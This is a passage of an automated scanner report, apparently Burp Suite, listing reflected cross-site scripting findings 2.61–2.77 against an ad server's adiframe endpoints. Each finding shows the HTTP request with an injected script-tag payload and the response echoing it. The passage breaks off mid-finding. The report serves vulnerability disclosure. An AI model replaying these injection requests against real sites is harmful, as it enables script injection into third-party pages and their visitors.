Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 68f0e><script>alert(1)</script>1c8ca3d61d3 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=68f0e><script>alert(1)</script>1c8ca3d61d3 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=68f0e><script>alert(1)</script>1c8ca3d61d3><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CAD
...[SNIP]...

2.61. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>367d4ee1dd was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]8b32d"><script>alert(1)</script>367d4ee1dd HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]8b32d"><script>alert(1)</script>367d4ee1dd;adiframe=y">
...[SNIP]...

2.62. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5747e"><script>alert(1)</script>99dd4217e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH5747e"><script>alert(1)</script>99dd4217e0;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH5747e"><script>alert(1)</script>99dd4217e0;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.63. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 719d3"><script>alert(1)</script>50f3b928662 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&719d3"><script>alert(1)</script>50f3b928662=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&719d3"><script>alert(1)</script>50f3b928662=1;adiframe=y">
...[SNIP]...

2.64. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22e4"><script>alert(1)</script>e1024253c05 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]d22e4"><script>alert(1)</script>e1024253c05 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]d22e4"><script>alert(1)</script>e1024253c05;adiframe=y">
...[SNIP]...

2.65. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a3ae0><script>alert(1)</script>ce43ade6607 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH;target=a3ae0><script>alert(1)</script>ce43ade6607 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=a3ae0><script>alert(1)</script>ce43ade6607><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CAD
...[SNIP]...

2.66. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40453"><script>alert(1)</script>7fbb26c9a98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH40453"><script>alert(1)</script>7fbb26c9a98;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH40453"><script>alert(1)</script>7fbb26c9a98;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.67. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 669cd"><script>alert(1)</script>17dfe9ed23c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&669cd"><script>alert(1)</script>17dfe9ed23c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&669cd"><script>alert(1)</script>17dfe9ed23c=1;adiframe=y">
...[SNIP]...

2.68. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 23a02><script>alert(1)</script>84b2b0ffe6a was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=23a02><script>alert(1)</script>84b2b0ffe6a HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=23a02><script>alert(1)</script>84b2b0ffe6a><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CAD
...[SNIP]...

2.69. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac568"><script>alert(1)</script>445b737e7e was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ac568"><script>alert(1)</script>445b737e7e HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]ac568"><script>alert(1)</script>445b737e7e;adiframe=y">
...[SNIP]...

2.70. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df345"><script>alert(1)</script>bd058dcb6b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECHdf345"><script>alert(1)</script>bd058dcb6b3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428] HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECHdf345"><script>alert(1)</script>bd058dcb6b3;target=_blank;kvg=528;kvi=US_FL;grp=[36993428];adiframe=y">
...[SNIP]...

2.71. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c2"><script>alert(1)</script>47db9872ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&c62c2"><script>alert(1)</script>47db9872ba7=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]&c62c2"><script>alert(1)</script>47db9872ba7=1;adiframe=y">
...[SNIP]...

2.72. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2786"><script>alert(1)</script>40b84c3f202 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]c2786"><script>alert(1)</script>40b84c3f202 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]c2786"><script>alert(1)</script>40b84c3f202;adiframe=y">
...[SNIP]...

2.73. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload cf8d5><script>alert(1)</script>1317b9c8006 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH;target=cf8d5><script>alert(1)</script>1317b9c8006 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://accounting.careerbuilder.com/ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 290

<html><body><base target=cf8d5><script>alert(1)</script>1317b9c8006><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CAD
...[SNIP]...

2.74. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce18d"><script>alert(1)</script>d45c1675446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECHce18d"><script>alert(1)</script>d45c1675446 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECHce18d"><script>alert(1)</script>d45c1675446;adiframe=y">
...[SNIP]...

2.75. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45421"><script>alert(1)</script>36b2f6b585b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH?45421"><script>alert(1)</script>36b2f6b585b=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECH?45421"><script>alert(1)</script>36b2f6b585b=1;adiframe=y">
...[SNIP]...

2.76. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a09"><script>alert(1)</script>28c78281f47 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]e3a09"><script>alert(1)</script>28c78281f47 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]e3a09"><script>alert(1)</script>28c78281f47;adiframe=y">
...[SNIP]...

2.77. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403936|0|225|ADTECH

Issue detail

